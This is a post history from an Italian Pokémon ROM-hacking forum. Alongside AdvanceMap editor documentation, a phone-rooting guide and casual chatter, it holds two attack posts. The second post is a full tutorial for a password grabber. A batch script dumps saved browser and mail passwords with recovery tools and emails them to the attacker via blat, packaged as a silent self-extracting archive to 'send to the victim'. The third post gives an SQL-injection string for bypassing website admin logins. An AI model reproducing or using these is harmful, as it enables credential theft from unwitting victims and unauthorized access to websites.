Pokémon Hacking Rom Community

Posts written by Kodak Black

  1. .
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    *** Combinazioni di tasti ***
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    In ogni menu sono visibili le combinazioni di tasti corrispondenti, se disponibili.
    Vedio le differenti possibilità durante la modifiche delle mappe.

    Vista mappa:
    -------------
    Tasto sinistro del mouse => Posiziona il blocco attuale sulla mappa.
    Tasto centrale del mouse => Sostituisce tutti i blocchi contigui a quello selezionato con quello attuale.
    Tasto destro del mouse => Il blocco selezionato diventa quello attuale.

    Ctrl + Tasto sinistro del mouse => Niente di speciale, posiziona il blocco attuale sulla mappa.
    Ctrl + Tasto centrale del mouse => Sostituisce tutti i blocchi simili (anche non contigui) a quello selezionato con quello attuale.
    Ctrl + Tasto destro del mouse => Permette di scegliere e posizionare più blocchi alla volta.


    Vista mappa (tavolozza bocchi):
    --------------------------------
    Tasto sinistro del mouse => Il blocco selezionato diventa quello attuale.
    Tasto centrale del mouse => Select hovered block as current.
    Tasto destro del mouse => Select hovered block as current.

    Ctrl + Tasto sinistro del mouse => Select hovered block as current.
    Ctrl + Tasto centrale del mouse => Select hovered block as current.
    Ctrl + Tasto destro del mouse => Permette di scegliere e posizionare più blocchi alla volta.


    Vista movimenti permessi:
    --------------------------
    Tasto sinistro del mouse => Posiziona il blocco attuale sulla mappa.
    Tasto centrale del mouse => Sostituisce tutti i blocchi contigui a quello selezionato con quello attuale.
    Tasto destro del mouse => Il blocco selezionato diventa quello attuale.

    Ctrl + Tasto sinistro del mouse => Posiziona il blocco attuale sulla mappa.
    Ctrl + Tasto centrale del mouse => Sostituisce tutti i blocchi contigui a quello selezionato con quello attuale.
    Ctrl + Tasto destro del mouse => Il blocco selezionato diventa quello attuale.


    Vista movimenti permessi (tavolozza):
    --------------------------------------
    Tasto sinistro del mouse => Il blocco selezionato diventa quello attuale.
    Tasto centrale del mouse => Il blocco selezionato diventa quello attuale.
    Tasto destro del mouse => Il blocco selezionato diventa quello attuale.

    Ctrl + Tasto sinistro del mouse => Il blocco selezionato diventa quello attuale.
    Ctrl + Tasto centrale del mouse => Il blocco selezionato diventa quello attuale.
    Ctrl + Tasto destro del mouse => Il blocco selezionato diventa quello attuale.


    Vista eventi:
    --------------
    Tasto sinistro del mouse => Seleziona/sposta l'evento di posizione superiore.
    Tasto centrale del mouse => Seleziona l'evento di posizione superiore (nessun movimento).
    Tasto destro del mouse => Seleziona/sposta l'evento di posizione inferiore.

    Ctrl + Tasto sinistro del mouse => Seleziona/sposta l'evento di posizione superiore.
    Ctrl + Tasto centrale del mouse => Seleziona l'evento di posizione superiore (nessun movimento).
    Ctrl + Tasto destro del mouse => Seleziona/sposta l'evento di posizione inferiore.

    Doppio click sinistro => Seleziona l'evento di posizione superiore e lo apre con l'editor di script.
    Doppio click centrale => Seleziona l'evento di posizione superiore e lo apre con l'editor di script.
    Doppio click destro => Seleziona l'evento di posizione inferiore e lo apre con l'editor di script.


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    *** Contenuto degli INI ***
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    AdvanceMap.ini:
    ---------------
    L'INI è stato completamente riscritto.
    Ora ogni linguaggio ha le sue impostazioni specifiche.
    Ogni gioco, inoltre, ha impostazioni apposite.
    Infine ogni offset è immagazzinato secondo un pattern.

    Esempio:
    [MapBankHeader]
    art=pointer
    nach=80180068890B091808687047
    spiele=BPR,BPG,BPE,AXP,AXV

    Questo indica che i byte dopo "nach" rappresentano il pointer dell'header mappa.
    Queste impostazioni sono uguali per tutti i giochi e sono presenti sotto la lista "spiele".


    Esempio 2:
    [PokemonNamen]
    inkSprache=1
    art=pointer
    vor=30B50025084CC8F7
    spiele=AXPJ,AXVJ,AXPE,AXVE

    [PokemonNamen2]
    art=pointer
    position=$000144
    spiele=BPR,BPG,BPE,AXP,AXV

    Qui ci sono due parti. La prima, tutti i parametri dei linguaggi sono sotto "spiele"- listing, perchè "inkSprache" è settato a 1.
    Also we have the pointer to the at point "vor" described Bytes.
    Dato che non tutti i giochi usano la prima parte, ce n'è una seconda universale.
    Dopo la seconda parte, il pointer sarà trovato alla posizione impostata nella variabile "position".


    I valori esadecimali devono sempre avere il "$"!


    Main.ini
    --------
    Questo è l'ordine di come le mappe vengono listate.
    Il formato è il seguente:

    [<foldername>]
    1=<bank>.<map>
    2=<bank>.<map>
    3=<bank>.<map>
    4=<bank>.<map>
    5=<bank>.<map>
    ...

    Esempio:
    [0]
    1=0.0
    2=0.1
    3=0.2
    ...

    [1]
    1=1.0
    ...

    I nomi delle cartelle possono essere cambiati a tuo piacimento.

    Ci sono delle eccezioni:
    [<foldername>]
    1=<label>
    2=<label>
    ...

    Per maggiori informazioni, vedi Maps.ini


    Maps.ini
    --------
    Here the maps are listed, but only the ones that are listed in Main.ini
    appear.

    [<bank>.<map>]
    Name=<label>

    [0.0]
    Name=PETALBURG CITY

    [1.0]
    Name=Route 101

    Importante:
    Qui dovresti modificare unicamente l'attributo "name".
    La parte "[0.0]" si riferisce alla posizione dell'header mappa. Se alterato, la mappa potrebbe non funzionare più!
    Gli offset non sono più usati in questa versione ma possono tranquillamente rimanere.

    Eccezione:
    Qui, per ogni gioco, l'offset del footer mappa deve essere esplicitamente dichiarato.


    [<nome da Main.ini>]
    Name=<nome>
    <nome esatto>=<offset>


    Esempio:
    [UNKNOWN45]
    POKEMON SAPPAXPD=$2CA960
    name=Insel?


    Tilesets.ini
    ------------
    Questo file è stato rinnovato dalla versione 1.30.
    Volendo puoi cambiare il numero di blocchi associato a ciascun tileset (il primo tileset è il numero 0).
    Se il tileset è nella parte superiore avrà automaticamente 200 blocchi.

    [1]
    Blocks=$90

    ...

    [24]
    Blocks=$87


    Sprachen.ini
    ------------
    Qui c'è la lista di tutte le lingue disponibili.

    Esempio:
    [Sprachen]
    1=Deutsch
    2=English

    Nella sottocartella "Ini/Sprachen" puoi trovare un file <nomelingua>.ini contenente le varie stringhe.
    Puoi aggiungere quante lingue vuoi, ma devi curarti della "Licenza utente finale".
    La "Licenza utente finale" deve essere tradotta, ed inviata a me in modo che la posso criptare.
    Finché non hai fatto ciò, la lingua non è disponibile...
    La lingua può essere cambiata tramite "Impostazioni"->"Lingua".

    Al primo avvio di AdvanceMap è possibile scegliere la lingua che preferisci.

    File come GehDaten.ini/AufgabenDaten.ini ed altri sono stati inclusi nei nuovi file delle varie lingue.


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    *** Descrizione degli errori ***
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    AdvanceMapError(1): Try to read at pos 0! Please contakt [email protected]
    AdvanceMap ha tentato di leggere dei byte all'offset 0 della ROM. (-> vietato)

    AdvanceMapError(2): Cannot read bytes behind end of file! Please contakt [email protected]
    AdvanceMap ha tentato di leggere dei byte oltre la fine della ROM. (-> impossibile)

    AdvanceMapError(3): Cannot change bytes at pos 0! Please contakt [email protected]
    AdvanceMap ha tentato di scrivere dei byte all'offset 0 della ROM. (-> vietato)

    AdvanceMapError(4): Cannot change bytes behind end of file! Please contakt [email protected]
    AdvanceMap ha tentato di scrivere dei byte oltre la fine della ROM. (-> impossibile)

    AdvanceMapError(5): The value at $XXXXXX is not a Pointer! Please contakt [email protected]
    Il valore all'offset specificato dovrebbe essere un pointer, ma non lo è. (-> dati errati)

    AdvanceMapError(6): Try to read more than 1023 Bytes a time! Please contakt [email protected]
    AdvanceMap, tramite una funzione speciale, ha tentato di leggere più di 1023 byte. (-> bug in AdvanceMap)

    AdvanceMapError(7): Try to save more than 1023 Bytes a time! Please contakt [email protected]
    AdvanceMap, tramite una funzione speciale, ha tentato di scrivere più di 1023 byte. (-> bug in AdvanceMap)

    AdvanceMapError(: Cannot read XX Bytes in a Array with the size of YY! Have read as much as possible. Please contakt [email protected]
    AdvanceMap ha tentato di caricare un numero di byte superiore all'indice massimo dell'array. (-> bug in AdvanceMap)

    AdvanceMapError(9): Pleace Extract the gba file from your zip/rar archive and open the gba file.
    AdvanceMap non può leggere una ROM compressa in un archivio zip/rar in quanto va prima decompressa. (-> attenzione ^^)

    AdvanceMapError(10): Cannot handle more then 60 MapNumbers per WorldMap. Please contakt [email protected]
    Errore nell'editor della mappa del mondo, relativo alla funzione tuttora non attiva "Gestisci numeri mappa del mondo" (RF/VF).

    AdvanceMapError(11): The File could not be open.
    Impossibile aprire il file.

    AdvanceMapError(12): Unknown Rom Type! This Rom cannot be edited with Advancemap.
    La ROM aperta non corrisponde ad un gioco supportato. Solo le ROM Pokémon della generazione Advance possono essere modificate con AdvanceMap.
  2. .
    1) Scaricate :
    -Blat da http://sourceforge.net/project/showfiles.php?group_id=81910
    -I password recovery : CERCATELO VOI
    -Password fox : www.nirsoft.net/utils/passwordfox.htm
    -Ie passview : www.nirsoft.net/utils/internet_explorer_password.html
    -Mail passview : www.nirsoft.net/utils/mailpv.html
    -MSpass : www.nirsoft.net/utils/mspass.html
    -Batch to exe da www.download.com/Bat-To-Exe-Convert...4-10555897.html

    2) Create una cartella e all'interno create un file .bat di nome mail.bat con questo codice
    CODICE
    @mspass.exe /stext mspass.txt
    @mailpv.exe /stext mailpv.txt
    @iepv.exe/stext iepv.txt
    @passwordfox.exe/stext passwordfox.txt
    @blat -install out.alice.it "[email protected]"
    cls
    @echo COMPUTERNAME = %COMPUTERNAME% > log.txt
    @echo USERNAME = %­USERNAME% >> log.txt
    @echo USERDOMAIN = %­USERDOMAIN% >> log.txt
    @echo USERPROFILE = %­USERPROFILE% >> log.txt
    @echo. >> log.txt
    @rar.exe a Pass_%computername%.rar *.txt > nul
    @blat testo.txt -to "Email" -try 2 -subject "password" -attach Pass_%computername%.rar
    end

    (modificate il campo email con la vostra email)


    Potete aggiungere dei nuovi programmi al grabber che potete scaricare da www.nirsoft.net
    Basta aggiungere all'inizio del codice questo :
    CODICE
    @nomeprogramma.exe /stext nomeprogramma.txt

    nomeprogramma sta per il nome del programma inserito nel grabbere;ad esempio se il file è mspass.exe dovete mettere mspass

    3) Nella cartella inserite i password recovery scaricati e il programma blat ( blat.exe , blat.dll e blat.lib )

    4) Ora aprite batch to exe e convertite il file bat che avete creato in exe e mettetelo nella stessa cancella
    Ora potete cancellare il file bat

    5) Selezionate tutti i file della cartella e con e fate tasto destro-> aggiungi ad un archivio (dovete avere win rar)
    Spuntate la casella Crea un archivio auto-estraente
    Andate in avanzate -> modulo autoestraente
    In percorso d'estrazione mettete : %*HOMEDRIVE%*WindowsSystem32 oppure se non va mettete %­HOMEDRIVE%­WINDOWSSystem32.
    In esegui dopo l'estrazione mettete : mail.exe
    Andate in modalità e selezionate nascondi tutto e sovrascrivi tutti i file già esistenti
    Cliccate OK
    Mandate il file creato alla vittima.
  3. .
    per per accedere come admin in un sito internet bisogna effettuare l'accesso come admin e scrivere su nome utente ' or ''='
    e su password ' or ''='

    (funziona su 1 sito su 3 quindi probabilmente se non vi accede in un sito è perché ha delle protezioni.).
  4. .
    Oggi voglio mostrarvi come eseguire il root dell’HTC One, il telefono di punta dell’azienda taiwanese. I passaggi sono semplici ma un po’ laboriosi, quindi vi consiglio di seguire attentamente la guida. L’unico requisito è avere un computer con Windows installato.

    1)Scaricate l’applicazione HTC One All-In-One Toolkit tramite questo link.
    2)Al termine del download decomprimete l’archivio. Nella cartella torcerete l’applicazione One.exe. Avviatela e collegate l’HTC One al PC.
    3)Nella schermata che si aprirà in alto a destra troverete un riquadro sopra il quale è presente la scritta To root the phone. Follow in order. Dentro il riquadro sono presenti delle voci. Dovrete selezionarne in ordine, dall’alto verso il basso, una ad una, e premere il tasto Go. In totale sono cinque voci:
    -Install HTC Drivers.
    -Register At HTCDev.
    -Get Token ID.
    -Submit Token ID.
    -Unlock BootLoader.

    4)Ora bisogna installare una recovery modificata sul dispositivo. Per farlo spostatevi nel riquadro in alto a destra Next, flash a recovery, selezionate ClockWordMod Touch successivamente cliccate su Flash Recovery.

    A questo punto il più è fatto ed avrete tutti i requisiti necessari per ottenere i permessi di root dell’HTC One.

    5)Nel riquadro in basso a destra Extras selezionate la voce Perm Root e successivamente cliccate il tasto Run. Attendete il termine della procedura e alla fine avrete sbloccato il vostro telefono. Se Android dovesse comunicarvi che SuperSu deve essere aggiornato procedete come segue:
    -Scaricate il file SuperSu da questo link e trasferitelo sulla memoria esterna dell’HTC One.
    -Spegnete il dispositivo e riavviatelo tenendo premuto i tasti Volume giù + Tasto di accensione.
    -Nella nuova schermata selezionate install zip from sdcard, cercate il file che avete scaricato precedentemente ed avviate il flash.
  5. .
  6. .
    Ti banno perché stai bannando tutti xD
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    :yuppi:
  8. .
    578
  9. .
    CITAZIONE (~Chris™ @ 23/3/2014, 22:51) 
    Benvenuto nella nostra community: spero che tu possa trovarti bene con noi :)

    Grazie dell'accoglienza
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    CITAZIONE (kankro95 @ 23/3/2014, 22:38) 
    Benvenuto :) se ti interessa spritare i pokemon vieni nella mia scuola
    aggiungo chris su face che ti aggiunge alla chatt staff ;)

    Ok
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    Salve a tutti sono Wesker99jr (come già avrete letto dal mio nickname) e sono qui perché vorrei imparare a moddare i giochi Pokémon, spero di fare amicizia con tutti voi... Ci vediamo sul forum :pedo:
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    Con che programma hai creato questi Sprite
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    Impara l'italiano prima...
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    LG Nexus 5
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    Domani miei cari ragassuoli prendo la console Pioneer DDJ Wego... qualcuno di voi l'ha provata?
15 replies since 26/11/2012
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